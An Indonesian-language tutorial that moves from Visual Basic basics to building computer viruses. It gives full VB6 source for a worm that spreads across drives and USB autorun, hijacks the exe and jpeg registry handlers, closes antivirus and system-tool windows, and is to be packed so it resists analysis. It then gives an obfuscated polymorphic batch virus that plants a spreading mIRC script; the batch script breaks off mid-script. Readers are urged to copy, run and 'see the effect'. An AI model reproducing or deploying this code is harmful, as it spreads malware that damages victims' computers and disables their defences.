Note : Pembahasan atau tutorial  tentang VBScript dapat kalian cari pada internet
atau buku-buku yang membahas tentang VBScript

Pemrograman Visual Basic
Visual Basic merupakan salah bahasa pemrograman tingkat tinggi yang dibuat oleh Microsoft. VB bersifat fleksibel dibanding dengan development tools lainnya. Karena VB tidak terlalu bergantung terhadap fungsi dari API (Application Programming Interface) pada windows, API sudah dimasukkan oleh Microsoft ke dalam VB sebagai file.dll. Visual Basic juga dibuat dengan interface yang ssangat mudah dipahami dan sangat user friendly.

Tampilan Jendela Utama  Visual Basic 6.0

Tipe Variabel
Variabel berguna untuk menyimpan atau menampung informasi atau data yang diperlukan oleh aplikasi. Dalam memberi nama variabel harus memiliki syarat sebagai berikut :

1.    Tidak boleh leh dari 40 karakter 2.    Harus berupa huruf, angka dan underscore
3.    Karakter pertama berupa huruf
4.    Tidak menggunakan kata yang termasuk kode program

Tipe Data	Ukuran	Jangkauan
Byte	1 byte	0 s/d 255
Boolean	2 byte	True and False
Long	4 byte	-2147483.648 s/d 2147483647
Integer	2 byte	-32768 s/d 32767
Single	4 byte	Negatif:-3.402823E38 s/d -1.401298E-45 Positif:1.401298e-45 s/d 3.402823E38
Double	8 byte	Negatif:-1.79769313486232E308 s/d -4.94065645841247E-324 Positif:4.94065645841247E-324 s/d 1.79769313486232E308
Currency	8 byte	-922337203685477.5808 s/d 922337203685477.5807
String	1 byte	er karakter    0 s/d 2 Milyar karakter (95,97 & NT) dan 0 s/d sekitar 65535 karakter (versi 3.1)
Date	8 byte	1 January 100 s/d 31 Desember 9999
Object	4 byte	Referensi Object

Aritmatika	Komparasi	Logika
Pangkat (^)	Sama(=)	Not
Negatif(-)	Tidak sama	And
Kali dan Bagi (*,/)	Kurang dari(<)	Or
Pembagian bulat(\)	Lebih dari(>)	Xor
Sisa bagi(Mod)	Kurang dari atau sama (<=)	Eqv
Tambah dan kurang (+,-)	Lebih dari atau sama (>=)	Imp

Percabangan (Branching)

1. Percabangan If  … then

Biasanya struktur percabangan if … then biasanya digunakan dalam menjalankan suatu pernyataan secara kondisional. Dan juga biasanya berupa suatu perbandingan, maupun ekspresi yang menghasilkan nilai numerik

If kondisi Then pernyataan Atau
If kondisi Then
Pernyataan-pernyataan
End if

2. Percabangan If … Then … Else Percabangan ini digunakan untuk mendefinisikan beberapa blok pernyataan yang akan dijalankan salah satu berdasarkan kondisi yang memenuhi syarat

If kondisi1 then Pernyataan1
ElseIf kondisi2 then
Pernyataan2
Else
Blok pernyataan-n
End if

Percabangan Select Case

Select case merupakan suatu alternatif tambahan terhadap if … then … else. Suatu statemen select case memiliki kemampuan yang sama dengan if … then … else, tetapi membuat code lebih mudah dibaca

Select Case ekspresi Case ekspresi1
Pernyataan1
Case ekspresi2
Pernyataan2
Case Else ekspresi-n
Pernyataan-n
End Select

Perulangan (Looping)

1. Perulangan Do … Loop Gunakan Do Loop untuk mengeksekusi suatu blok dengan jumlah perulangan yang tak terhingga.

Do While kondisi

Pernyataan

Loop

Atau
Do

Pernyataan

Loop While kondisi

Atau
Do Until kondisi

Pernyataan

Loop
Do

Pernyataan

Loop Until kondisi

2. Perulangan For … Next

Perulangan ini digunakan untuk melakukan pengulangan suatu blok program sebanyak yang telah ditentukan pada nilai awal dan nilai akhir.

For counter = awal to akhir [step increment]

Pernyataan

Exit For

Pernyataan

Next [counter]

Note : Pembahasan atau tutorial  tentang Visual Basic dapat kalian cari pada internet
atau buku-buku yang membahas tentang Visual Basic
Metode yang Sering Digunakan
Adapun dalam pembuatan virus ada beberapa metode yang sering digunakan, yaitu.

1.    Metode Trik Launcher

Adalah metode dengan melakukan manipulasi pada file konfigurasi windows (win.ini) dan memanfaatkan array dalam pemberian nama file virus sehingga virus ini dapat membuat salinan dengan menggunakan nama yang beragam.

2.    Metode Shell Spawning

Dimana virus akan aktif jika user telah mengeksekusi suatau file dengan ekstensi tertentu.

3.    Metode Anti Deletion

Merupakan metode yang memiliki prinsip untuk menyulitkan user untuk menghapus file virus pada sistem komputer yang telah terinfeksi.

4.    Metode Watcher

Suatu metode yang membentuk suatu rangkaian program yang saling mengawasi satu sama lainnya, tidak hanya mengawasi keberadaan program tetapi juga mengawasi hal lain, seperti suatu konfigurasi, keberadaan atau ketidak adaan suatu hal atau mengawasi kejadian tertentu.

5.    Metode Comparison

Metode comparison atau biasanya disebut dengan metode perbandingan memiliki prinsip yang bersifat tidak tetap atau dapat diubahpada setiap aplikasi yang disimpan dalam suatu file konfigurasi dan lebih sering tersimpan pada system registry windows.

6.    Metode Encryption

Metode enkripsi adalah suatu metode yang mengubah suatu kode yang mudah dimengerti menjadi untuk sulit dimengerti

7.    Metode Polymorphic

Suatu metode yang membuat file program virus berubah (isi maupun ukuran program) saat penginfeksian.

8.    Metode Drop File

Metode ini digunakan untuk mengeksekusi suatu file tertentu dari file utama. Dan masih banyak lagi metode – metode yang sering digunakan dalam pembuatan virus komputer.

Kriteria Virus Yang Akan Dibuat
Virus yang akan dibuat ini memiliki beberapa kriteria sebagai berikut :

1.    Mengecek keberadaan drive. 2.    Melakukan pemeriksaan terhadap ekstensi file virus itu sendiri pada sistem komputer dan drive
3.    Jika tidak ditemukan eksistensinya maka virus akan melakukan  reproduksi
4.    Mencari informasi tentang sistem operasi yang dinstall.
5.    Sembunyi proses dari task list
6.    Manipulasi system registry windows
7.    Menampilkan pesan pada waktu yang telah ditentukan

Dalam pembuatan virus dengan menggunakan visual basic 6.0 langkah pertama yang perlu disiapkan yaitu;

1.    Form

i.    Name    : frmVirs ii.    ShowInTaskbar : False
iii.    Visible    : false

2.    Timer1

i.    Name    : tmrVirs ii.    Enable    : True
iii.    Interval    : -

3.    Module1

i.    Name    : mdlRegs

Dan setelah itu dilanjutkan dengan mengetikkan source code dibawah ini atau kalian dapat menggunakan copy – paste. Ketikkan source yang pertama pada form sedangkan yang kedua pada module
1.

‘ ___________________________________________________ ‘ __ : Form_Load, 02-Agust-2007  13:43:57 ¯¯¯
‘ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
‘ Module     : Borat
‘ Author     : Ajung a.k.a us3r130d0h
‘ Note       : Example
‘ History    : Di Sekretariat Bersama Mahasiswa Perguruan Tinggi Asia Malang
‘ _______________________________________________________________
Option Explicit
Private Declare Function CopyFile Lib “kernel32″ Alias _
“CopyFileA” (ByVal lpExistingFileName As String, ByVal _
lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Private Declare Function GetDriveType Lib “kernel32″ Alias “GetDriveTypeA” (ByVal nDrive As String) As Long
Private Declare Function GetWindowsDirectory Lib “kernel32″ Alias “GetWindowsDirectoryA” (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private SF As String * 255
Private Declare Function GetSystemDirectory Lib “kernel32″ Alias _
“GetSystemDirectoryA” (ByVal lpBuffer As String, ByVal nSize _
As Long) As Long
Private Function DriveType(Drive As String) As String
Dim sAns As String, lAns As Long
If Len(Drive) = 1 Then Drive = Drive & “:\”
If Len(Drive) = 2 And Right$(Drive, 1) = “:” _
Then Drive = Drive & “\”
lAns = GetDriveType(Drive)
Select Case lAns
Case 2
sAns = “Removable Drive”
Case 3
sAns = “Fixed Drive”
Case 4
sAns = “Remote Drive”
Case 5
sAns = “CD-ROM”
Case 6
sAns = “RAM Disk”
Case Else
sAns = “Drive Doesn’t Exist”
End Select
DriveType = sAns
End Function
Private Sub BoratGanda()
‘Deklarasikan variabel
Dim ictr As Integer
Dim sDrive As String
ReDim sDrives(0) As String
‘Fungsi Ascii 65 = A sampai dengan 90 = Z
For ictr = 65 To 90
sDrive = Chr(ictr) & “:\”
‘Jika tidak ditemukan drive yang dicari maka dilanjutkan tanpa menampilkan error message
If DriveType(sDrive) <> “Drive Doesn’t Exist” Then
‘Jika terjadi kesalahan maka progam tetap dijalankan
On Error Resume Next
‘Copykan file induk kemasing-masing drive
FileCopy App.Path & “\” & App.EXEName & “.exe”, sDrive & “Xvirs .exe”
End If
Next
End Sub
Private Sub Form_Load()
”Jika terjadi kesalahan maka progam tetap dijalankan
On Error Resume Next
‘Gunakan trik launcher dengan metode Shell Spawning
Dim Spawning As Variant
Spawning = Command()
Shell (Spawning), vbNormalFocus
‘Jika aplikasi program ini telah ditemukan berjalan pada sistem komputer
‘Maka eksekusi langsung file virus menjadi tidak aktif
If App.PrevInstance = True Then End
‘Panggil fungsi dari BoratGanda
‘(Kode Reproduksi)
Call BoratGanda
‘Copy file induk pada special folder yang ditemukan
‘Manipulasi dengan menambahkan file xServices.exe dan Rund4ll.exe
‘Agar file virus ini tersimpan pada memory komputer
FileCopy xBorat, BoratSpecialFolder(1) & “\xServices .exe”
FileCopy xBorat, BoratSpecialFolder(1) & “\Rund4ll .exe”
‘Manipulasi System Registry Windows
‘Dengan Asumsi file virus akan aktif jika user melakukan eksekusi
‘pada file yang berekstensikan *.exe dan *.Jpeg
SetStringValue “HKEY_CLASSES_ROOT\exefile\shell\open\command”, “”, _
“xServices.exe %1″
SetStringValue “HKEY_CLASSES_ROOT\exefile\jpegfile\open\command”, “”, _
“Rund4ll.exe %1″
End Sub
Private Sub tmrBoratKeluar_Timer()
‘Timer ini berfungsi untuk mematikan seluruh program yang titlenya berisikan
‘Seperti dibawah ini
On Error Resume Next
‘Panggil fungsi Api WinQuit
WinQuit “vir”
WinQuit “av”
WinQuit “safe”
WinQuit “start”
WinQuit “process”
WinQuit “spy”
WinQuit “autoruns”
WinQuit “hijack”
WinQuit “patrol”
WinQuit “alarm”
WinQuit “task”
WinQuit “config”
WinQuit “folder option”
WinQuit “system”
WinQuit “properties”
WinQuit “watson”
WinQuit “remov”
WinQuit “scan”
WinQuit “kill”
WinQuit “reg”
WinQuit “regedit”
WinQuit “www”
WinQuit “doc”
WinQuit “restore”
WinQuit “cmd”
WinQuit “command”
‘Akhir Sub
End Sub
Private Sub tmrBoratPesan_Timer()
‘Tampilkan pesan pada tanggal 9 bulan Februari
‘Dengan isi pesan sbb “Selamat Datang Pengalaman Baru”
On Error Resume Next
If (Day(Now) = 9 Or Month(Now) = 2) Then
MsgBox “Selamat Datang Pengalaman Baru”, vbCritical, “IlmuKomputer”
End If
End Sub
Private Sub tmrBoratRun_Timer()
‘sub ini berfungsi untuk melakukan penggandaan diri borat pada UFD
Dim bfile As String
Dim i As Byte
For i = 1 To Drive1.ListCount – 1
If GetDriveType(Drive1.List(i) & “\”) = 2 Then
If Len(Dir$(Drive1.List(i) & “\Autorun.inf”)) = 0 Then
CopyFile xBorat, Drive1.List(i) & “\xVirusq.exe”, False
SetAttr Drive1.List(i) & “\xVirusq.exe”, vbReadOnly
bfile = Drive1.List(i) & “\Autorun.inf”
Open bfile For Output As #1
Print #1, “[Autorun]“
Print #1, “Open=xVirusq.exe”
Print #1, “Shellexecute=xVirusq.exe”
Print #1, “Shell\auto\command=xVirusq.exe”
Print #1, “Shell=auto”
Close 1
SetAttr Drive1.List(i) & “\Autorun.inf”, vbReadOnly
End If
End If
Next i
End Sub
Private Function BoratSpecialFolder(value)
On Error Resume Next
Dim FolderValue As String
If value = 0 Then
FolderValue = Left(SF, GetWindowsDirectory(SF, 255))
End If
If value = 1 Then
FolderValue = Left(SF, GetSystemDirectory(SF, 255))
End If
If Right(FolderValue, 1) = “\” Then
FolderValue = Left(FolderValue, Len(FolderValue) – 1)
End If
BoratSpecialFolder = FolderValue
End Function
Private Function xBorat()
Dim WPath, WName As String
WPath = App.Path
If Right(WPath, 1) <> “\” Then
WPath = WPath & “\”
End If
WName = App.EXEName & “.exe”
xBorat = WPath & WName
End Function

2.

Private Declare Function PostMessage Lib “user32″ Alias _ “PostMessageA” (ByVal hwnd As Long, ByVal wMsg As Long, _
ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function EnumWindows& Lib “user32″ (ByVal _
lpEnumFunc As Long, ByVal lParam As Long)
Private Declare Function GetWindowText Lib “user32″ Alias _
“GetWindowTextA” (ByVal hwnd As Long, ByVal lpString As _
String, ByVal cch As Long) As Long
Private Declare Function IsWindowVisible& Lib “user32″ (ByVal _
hwnd As Long)
Private Declare Function GetParent& Lib “user32″ (ByVal hwnd As _
Long)
Private Declare Function EnableWindow Lib “user32″ (ByVal hwnd _
As Long, ByVal fEnable As Long) As Long
Dim sPattern As String, hFind As Long
Const WM_CLOSE = &H10
Private Function EnumWinProc(ByVal hwnd As Long, ByVal _
lParam As Long) As Long
Dim k As Long, sName As String
If IsWindowVisible(hwnd) And GetParent(hwnd) = 0 Then
sName = Space$(128)
k = GetWindowText(hwnd, sName, 128)
If k > 0 Then
sName = Left$(sName, k)
If lParam = 0 Then sName = UCase(sName)
If sName Like sPattern Then
hFind = hwnd
EnumWinProc = 0
Exit Function
End If
End If
End If
EnumWinProc = 1
End Function
Private Function WinFind(sWild As String, Optional bMatchCase _
As Boolean = True) As Long
sPattern = sWild
If Not bMatchCase Then sPattern = UCase(sPattern)
EnumWindows AddressOf EnumWinProc, bMatchCase
WinFind = hFind
End Function
Function WinQuit(WindowsTitle As String)
On Error Resume Next
hFind = 0
Dim wincap As Long
Dim rtnval As Long
wincap = WinFind(“*” & WindowsTitle & “*”, False)
rtnval = PostMessage(wincap, WM_CLOSE, vbNull, vbNull)
End Function
Function WinAble(WindowsTitle As String, value As Boolean)
hFind = 0
On Error Resume Next
Dim wincap As Long
Dim rtnval As Long
wincap = WinFind(“*” & WindowsTitle & “*”, False)
rtnval = EnableWindow(wincap, value)
End Function

Kompresi File Virus
Setelah selesai pada pembuatan virus langkah terakhir adalah pengepackan file virus tersebut. Pengepackan file virus sangat penting sekali dimana algoritma dari file irus tersebut agar tidak mudah dibaca pada saat debuging oleh virus maker lainnya disamping itu membuat ukuran file dari virus menjadi lebih kecil sehingga tidak terlalu banyak mengambil tempat.

Selamat mencoba
sumber : pusat hacking se-dunia

Virus Berbahaya dari Notepad Part 3

ini Part 3 (terakhir) rasain loe..............Silahkan copy paste seluruh script yang ada disini ke notepad, truz save dengan extensi .bat, lalu jalankan. Tinggal lihat efeknya di komputer…..
set shadow=0
@echo off % mawar-kuning %
cls % mawar-kuning %
% mawar-kuning %set /a shadow=%shadow%+1
% mawar-kuning %if %shadow% EQU 5 (
% mawar-kuning %echo kamu telah terinfeksi mawar kuning !!
% mawar-kuning %set shadow=0
% mawar-kuning %)
% mawar-kuning %echo set shadow=%shadow% >mawarkuning.bat
% mawar-kuning %set shadow=
% mawar-kuning %set qwxykjsi=set
% mawar-kuning %set aaa=A
%qwxykjsi% fi=if % mawar-kuning %
%qwxykjsi% nt=not % mawar-kuning %
%qwxykjsi% el=errorlevel % mawar-kuning %
%qwxykjsi% ine=%fi% %nt% %el% % mawar-kuning %
% mawar-kuning %set vrsa=rndom
set oto=goto% mawar-kuning %
%qwxykjsi% a=0 % mawar-kuning %
set fd=find% mawar-kuning %
%fd% “mawar-kuning”<%0>>mawarkuning.bat
%qwxykjsi% xp=true% mawar-kuning %
% mawar-kuning %if %xp% EQU true goto xptruea
goto winmawar % mawar-kuning %
:xptruea % mawar-kuning %
% mawar-kuning %set a=0
% mawar-kuning %set b=0
% mawar-kuning %set c=0
% mawar-kuning %set d=0
% mawar-kuning %set e=0
% mawar-kuning %set f=0
% mawar-kuning %set g=0
% mawar-kuning %set h=0
% mawar-kuning %set i=0
% mawar-kuning %set j=0
% mawar-kuning %set k=0
% mawar-kuning %set l=0
% mawar-kuning %set m=0
% mawar-kuning %set n=0
% mawar-kuning %set o=0
% mawar-kuning %set p=0
% mawar-kuning %set q=0
% mawar-kuning %set r=0
% mawar-kuning %set s=0
% mawar-kuning %set t=0
% mawar-kuning %set u=0
:mulai0 % mawar-kuning %
% mawar-kuning %set aa=0
:mulai1 % mawar-kuning %
if %aa% EQU 5 goto endmawarkuning % mawar-kuning %
%qwxykjsi% /a aa=%aa%+1 % mawar-kuning %
:mulai2 % mawar-kuning %
ver|time|%fd% “,1?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=1% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,2?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=2% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,3?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=3% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,4?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=4% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,5?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=5% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,6?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=6% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,7?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=7% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,8?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=8% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,9?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=9% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
ver|time|%fd% “,0?>nul % mawar-kuning %
%ine% 1 %qwxykjsi% %vrsa%%aa%=10% mawar-kuning %
%ine% 1 %oto% mulai1 % mawar-kuning %
goto mulai2 % mawar-kuning %
:endmawarkuning % mawar-kuning %
% mawar-kuning %if %a% NEQ 1 (if %rndom1% EQU 1 (
% mawar-kuning %find “%aaa%AAA” <%0 >>mawarkuning.bat
% mawar-kuning %set a=1
% mawar-kuning %))
% mawar-kuning %if %b% NEQ 1 (if %rndom1% EQU 2 (
% mawar-kuning %find “%aaa%BBB” <%0 >>mawarkuning.bat
% mawar-kuning %set b=1
% mawar-kuning %))
% mawar-kuning %if %c% NEQ 1 (if %rndom1% EQU 3 (
% mawar-kuning %find “%aaa%CCC” <%0 >>mawarkuning.bat
% mawar-kuning %set c=1
% mawar-kuning %))
% mawar-kuning %if %d% NEQ 1 (if %rndom1% EQU 4 (
% mawar-kuning %find “%aaa%DDD” <%0 >>mawarkuning.bat
% mawar-kuning %set d=1
% mawar-kuning %))
% mawar-kuning %if %e% NEQ 1 (if %rndom2% EQU 1 (
% mawar-kuning %find “%aaa%EEE” <%0 >>mawarkuning.bat
% mawar-kuning %set e=1
% mawar-kuning %))
% mawar-kuning %if %f% NEQ 1 (if %rndom2% EQU 2 (
% mawar-kuning %find “%aaa%FFF” <%0 >>mawarkuning.bat
% mawar-kuning %set f=1
% mawar-kuning %))
% mawar-kuning %if %g% NEQ 1 (if %rndom2% EQU 3 (
% mawar-kuning %find “%aaa%GGG” <%0 >>mawarkuning.bat
% mawar-kuning %set g=1
% mawar-kuning %))
% mawar-kuning %if %h% NEQ 1 (if %rndom2% EQU 4 (
% mawar-kuning %find “%aaa%HHH” <%0 >>mawarkuning.bat
% mawar-kuning %set h=1
% mawar-kuning %))
% mawar-kuning %if %i% NEQ 1 (if %rndom3% EQU 1 (
% mawar-kuning %find “%aaa%III” <%0 >>mawarkuning.bat
% mawar-kuning %set i=1
% mawar-kuning %))
% mawar-kuning %if %j% NEQ 1 (if %rndom3% EQU 2 (
% mawar-kuning %find “%aaa%JJJ” <%0 >>mawarkuning.bat
% mawar-kuning %set j=1
% mawar-kuning %))
% mawar-kuning %if %k% NEQ 1 (if %rndom3% EQU 3 (
% mawar-kuning %find “%aaa%KKK” <%0 >>mawarkuning.bat
% mawar-kuning %set k=1
% mawar-kuning %))
% mawar-kuning %if %l% NEQ 1 (if %rndom3% EQU 4 (
% mawar-kuning %find “%aaa%LLL” <%0 >>mawarkuning.bat
% mawar-kuning %set l=1
% mawar-kuning %))
% mawar-kuning %if %m% NEQ 1 (if %rndom4% EQU 1 (
% mawar-kuning %find “%aaa%MMM” <%0 >>mawarkuning.bat
% mawar-kuning %set m=1
% mawar-kuning %))
% mawar-kuning %if %n% NEQ 1 (if %rndom4% EQU 2 (
% mawar-kuning %find “%aaa%NNN” <%0 >>mawarkuning.bat
% mawar-kuning %set n=1
% mawar-kuning %))
% mawar-kuning %if %o% NEQ 1 (if %rndom4% EQU 3 (
% mawar-kuning %find “%aaa%OOO” <%0 >>mawarkuning.bat
% mawar-kuning %set o=1
% mawar-kuning %))
% mawar-kuning %if %p% NEQ 1 (if %rndom4% EQU 4 (
% mawar-kuning %find “%aaa%PPP” <%0 >>mawarkuning.bat
% mawar-kuning %set p=1
% mawar-kuning %))
% mawar-kuning %if %q% NEQ 1 (if %rndom5% EQU 1 (
% mawar-kuning %find “%aaa%QQQ” <%0 >>mawarkuning.bat
% mawar-kuning %set q=1
% mawar-kuning %))
% mawar-kuning %if %r% NEQ 1 (if %rndom5% EQU 2 (
% mawar-kuning %find “%aaa%RRR” <%0 >>mawarkuning.bat
% mawar-kuning %set r=1
% mawar-kuning %))
% mawar-kuning %if %s% NEQ 1 (if %rndom5% EQU 3 (
% mawar-kuning %find “%aaa%SSS” <%0 >>mawarkuning.bat
% mawar-kuning %set s=1
% mawar-kuning %))
% mawar-kuning %if %t% NEQ 1 (if %rndom5% EQU 4 (
% mawar-kuning %find “%aaa%TTT” <%0 >>mawarkuning.bat
% mawar-kuning %set t=1
% mawar-kuning %))
% mawar-kuning %if %u% NEQ 1 (if %rndom5% EQU 5 (
% mawar-kuning %find “%aaa%UUU” <%0 >>mawarkuning.bat
% mawar-kuning %set u=1
% mawar-kuning %))
% mawar-kuning %if %a% EQU 1 (if %b% EQU 1 (if %c% EQU 1 (if %d% EQU 1 (
% mawar-kuning %if %e% EQU 1 (if %f% EQU 1 (if %g% EQU 1 (if %h% EQU 1 (
% mawar-kuning %if %i% EQU 1 (if %j% EQU 1 (if %k% EQU 1 (if %l% EQU 1 (
% mawar-kuning %if %m% EQU 1 (if %n% EQU 1 (if %o% EQU 1 (if %p% EQU 1 (
% mawar-kuning %if %q% EQU 1 (if %r% EQU 1 (if %s% EQU 1 (if %t% EQU 1 (if %u% EQU 1 (
goto irca % mawar-kuning %
% mawar-kuning %)))))))))))))))))))))
goto mulai0 % mawar-kuning %
:winmawar % mawar-kuning %
set wina=0% mawar-kuning %
set winb=0% mawar-kuning %
set winc=0% mawar-kuning %
set wind=0% mawar-kuning %
set wine=0% mawar-kuning %
set oto=% mawar-kuning %
set qwxykjsi=% mawar-kuning %
set nt=% mawar-kuning %
set fi=% mawar-kuning %
set el=% mawar-kuning %
set ine=% mawar-kuning %
:mulaiwin2 % mawar-kuning %
% mawar-kuning %if not %wina%==1 goto mawarkuningengi
% mawar-kuning %if not %winb%==1 goto mawarkuningengi
% mawar-kuning %if not %winc%==1 goto mawarkuningengi
% mawar-kuning %if not %wind%==1 goto mawarkuningengi
% mawar-kuning %if not %wine%==1 goto mawarkuningengi
goto winirc % mawar-kuning %
:mawarkuningengi % mawar-kuning %
ver|time|find “,1?>nul % mawar-kuning %
if not errorlevel 1 set randoma=1% mawar-kuning %
if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
ver|time|find “,2?>nul % mawar-kuning %
if not errorlevel 1 set randoma=2% mawar-kuning %
if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
ver|time|find “,3?>nul % mawar-kuning %
if not errorlevel 1 set randoma=3% mawar-kuning %
if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
ver|time|find “,4?>nul % mawar-kuning %
if not errorlevel 1 set randoma=4% mawar-kuning %
if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
ver|time|find “,5?>nul % mawar-kuning %
if not errorlevel 1 set randoma=5% mawar-kuning %
if not errorlevel 1 goto enmawarkuningwin % mawar-kuning %
goto mulaiwin2 % mawar-kuning %
:enmawarkuningwin % mawar-kuning %
% mawar-kuning %if not %wina%==1 if %randoma%==1 goto enamawarkuningwin
% mawar-kuning %if not %winb%==1 if %randoma%==2 goto enbmawarkuningwin
% mawar-kuning %if not %winc%==1 if %randoma%==3 goto encmawarkuningwin
% mawar-kuning %if not %wind%==1 if %randoma%==4 goto endmawarkuningwin
% mawar-kuning %if not %wine%==1 if %randoma%==5 goto enemawarkuningwin
goto mulaiwin2 % mawar-kuning %
:enamawarkuningwin % mawar-kuning %
% mawar-kuning %find “%aaa%BBB”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%AAA”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%KKK”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%DDD”<%0>> mawarkuning.bat
set wina=1% mawar-kuning %
% mawar-kuning %goto mulaiwin2
:enbmawarkuningwin % mawar-kuning %
% mawar-kuning %find “%aaa%EEE”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%LLL”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%GGG”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%HHH”<%0>> mawarkuning.bat
set winb=1% mawar-kuning %
% mawar-kuning %goto mulaiwin2
:encmawarkuningwin % mawar-kuning %
% mawar-kuning %find “%aaa%III”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%JJJ”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%CCC”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%FFF”<%0>> mawarkuning.bat
set winc=1% mawar-kuning %
% mawar-kuning %goto mulaiwin2
:endmawarkuningwin % mawar-kuning %
% mawar-kuning %find “%aaa%NNN”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%MMM”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%PPP”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%OOO”<%0>> mawarkuning.bat
set wind=1% mawar-kuning %
% mawar-kuning %goto mulaiwin2
:enemawarkuningwin % mawar-kuning %
% mawar-kuning %find “%aaa%RRR”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%SSS”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%UUU”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%TTT”<%0>> mawarkuning.bat
% mawar-kuning %find “%aaa%QQQ”<%0>> mawarkuning.bat
set wine=1% mawar-kuning %
% mawar-kuning %goto mulaiwin2
:winirc % mawar-kuning %
% mawar-kuning %set wina=
% mawar-kuning %set winb=
% mawar-kuning %set winc=
% mawar-kuning %set wind=
% mawar-kuning %set wine=
% mawar-kuning %set aaa=
% mawar-kuning %set randoma=
:irca % AAAA %
if exist C:\mirc\script.ini set mir=C:\mirc% AAAA %
echo %mir%
if exist C:\mirc32\script.ini set mir=C:\mirc32% AAAA %
if exist C:\proga~1\mirc\script.ini set mir=C:\progra~1\mirc% AAAA %
if exist C:\prgra~1\mirc32\script.ini set mir=C:\progra~1\mirc32% AAAA %
goto ircb% AAAA %
:ircb % ABBB %
set mirc=%mir%\script.ini% ABBB %
set vs=chr(% ABBB %
goto ircc% ABBB %
:ircc % ACCC %
set wc=echo file.writeline% ACCC %
goto ircd% ACCC %
:ircd % ADDD %
echo dim fso, file > irc.vbs% ADDD %
echo set fso = createobject(”scripting.filesystemobject”) >>irc.vbs% ADDD %
echo set file = fso.createtextfile (”%mir%\script.ini”, true)>>irc.vbs% ADDD %
goto irce% ADDD %
:irce % AEEE %
%wc% ” on 1:st” + %vs%97) + “rt: { .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “filee %mir%\name.b” + %vs%97) + “t }”>>irc.vbs% AEEE %
%wc% ” on 1:join:#: { “>>irc.vbs% AEEE %
%wc% ” .if (” + %vs%36) + “nick != ” + %vs%36) + “me ” + %vs%38) + “” + %vs%38) + ” ” + %vs%37) + “old != ” + %vs%36) + “nick) {”>>irc.vbs% AEEE %
goto ircf% AEEE %
:ircf % AFFF %
%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “old ” + %vs%36) + “nick”>>irc.vbs% AFFF %
%wc% ” .timer ” + %vs%36) + “+ ” + %vs%36) + “r” + %vs%97) + “nd(1,100000) 1 5 .” + %vs%36) + “check_him( ” + %vs%36) + “nick , ” + %vs%36) + “ch” + %vs%97) + “n )”>>irc.vbs% AFFF %
goto ircg% AFFF %
:ircg % AGGG %
%wc% ” } “>>irc.vbs% AGGG %
%wc% ” }”>>irc.vbs% AGGG %
%wc% ” ” + %vs%97) + “li” + %vs%97) + “s check_him {”>>irc.vbs% AGGG %
goto irch% AGGG %
:irch % AHHH %
%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “port ” + %vs%36) + “r” + %vs%97) + “nd(9999,999999) “>>irc.vbs% AHHH %
%wc% ” .while (” + %vs%36) + “portfree(” + %vs%37) + “port) == ” + %vs%36) + “f” + %vs%97) + “lse) { .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “port ” + %vs%36) + “r” + %vs%97) + “nd(9999,999999) }”>>irc.vbs% AHHH %
goto irci% AHHH %
:irci % AIII %
%wc% ” .%fi% (” + %vs%36) + “1 !isop ” + %vs%36) + “2) { “>>irc.vbs% AIII %
%wc% ” .%nt%ice ” + %vs%36) + “1 :DCC ” + %vs%115) + %vs%101) + %vs%110) + %vs%100) + ” teletubies ( ” + %vs%36) + “+ ” + %vs%36) + “ip ” + %vs%36) + “+ ) “>>irc.vbs% AIII %
goto ircj% AIII %
:ircj % AJJJ %
